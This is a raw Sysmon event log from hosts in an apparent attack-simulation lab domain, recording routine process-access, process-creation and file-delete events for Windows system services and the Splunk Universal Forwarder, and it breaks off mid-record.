12:24:24.004{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291672Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:24.004{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291671Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:24.004{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291670Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:24.004{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291669Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:24.004{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291668Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:24.004{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291667Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:24.004{BEA10069-D0C1-6086-0500-00000000BB01}416532C:\Windows\system32\csrss.exe{BEA10069-0278-6088-FE29-00000000BB01}6172C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000291666Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:24.004{BEA10069-D13E-6086-9900-00000000BB01}4082600C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{BEA10069-0278-6088-FE29-00000000BB01}6172C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000291665Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:24.005{BEA10069-0278-6088-FE29-00000000BB01}6172C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{BEA10069-D0C1-6086-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{BEA10069-D13E-6086-9900-00000000BB01}408C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000440588Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:24.208{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440587Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:24.208{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000440593Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:25.797{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=24C73448D7795DE9085627340F9F507F,SHA256=6BC64AF13DA349435C25EDBAF1AA468A4A4B8CBEB1418C0EBEEA2BF87DE21876,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000440592Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:25.380{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3083A74B8387053B19FEDC536DD1634B,SHA256=DC1E3310FC3C186353F59A307BA04989EBABA29AD3E9AE041C61FD67DD228E4F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000291721Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:25.908{BEA10069-D13E-6086-9D00-00000000BB01}17281968C:\Windows\system32\conhost.exe{BEA10069-0279-6088-012A-00000000BB01}6580C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291720Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:25.908{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291719Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:25.908{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291718Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:25.908{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291717Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:25.908{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291716Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:25.908{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291715Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:25.908{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291714Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:25.908{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291713Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:25.908{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291712Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:25.908{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291711Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:25.908{BEA10069-D0C1-6086-0500-00000000BB01}416532C:\Windows\system32\csrss.exe{BEA10069-0279-6088-012A-00000000BB01}6580C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000291710Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:25.908{BEA10069-D13E-6086-9900-00000000BB01}4082600C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{BEA10069-0279-6088-012A-00000000BB01}6580C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000291709Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:25.908{BEA10069-0279-6088-012A-00000000BB01}6580C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{BEA10069-D0C1-6086-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{BEA10069-D13E-6086-9900-00000000BB01}408C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000291708Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:25.375{BEA10069-0279-6088-002A-00000000BB01}69641184C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{BEA10069-D13E-6086-9900-00000000BB01}408C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291707Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:25.244{BEA10069-D13E-6086-9D00-00000000BB01}17281968C:\Windows\system32\conhost.exe{BEA10069-0279-6088-002A-00000000BB01}6964C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291706Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 